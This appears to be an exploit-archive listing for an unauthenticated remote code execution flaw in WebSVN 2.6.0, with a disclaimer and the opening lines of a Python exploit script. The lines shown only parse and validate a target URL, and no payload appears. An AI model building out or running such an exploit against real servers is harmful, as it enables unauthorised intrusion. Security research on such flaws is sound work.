Exploits / Vulnerability Discovered : 2021-06-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Websvn 2.6.0 remote code execution (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()